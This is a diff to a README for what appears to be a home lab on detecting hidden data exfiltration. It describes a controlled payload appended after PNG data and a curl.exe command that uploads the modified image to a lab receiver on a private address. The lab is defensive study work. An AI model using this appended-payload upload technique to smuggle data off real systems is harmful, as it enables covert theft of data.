WiLL75G/hidden-data-exfiltration-detection-lab/README.md

 The modified carrier continued to render normally as a PNG.

-### Important Technical Distinction
+## Important Technical Distinction

-The payload was appended after the PNG data.
+The controlled payload was appended after the PNG data.

 It was **not hidden inside image pixels**.

-This distinction is important because the experiment should not be represented as LSB or general steganography detection.
+This distinction matters because this experiment should not be represented as LSB or general steganography detection.

 ---

 # Phase 3: Transfer the Modified Carrier

-The modified carrier followed exactly the same network path:
+The modified carrier followed the same network path as the baseline:

 ```powershell
 curl.exe -X POST --data-binary "@C:\StegoLab\stego.png" -H "Content-Type: image/png" http://192.168.64.12:8081/upload
 ```

-Response:
+The receiver returned:

 ```text
 OK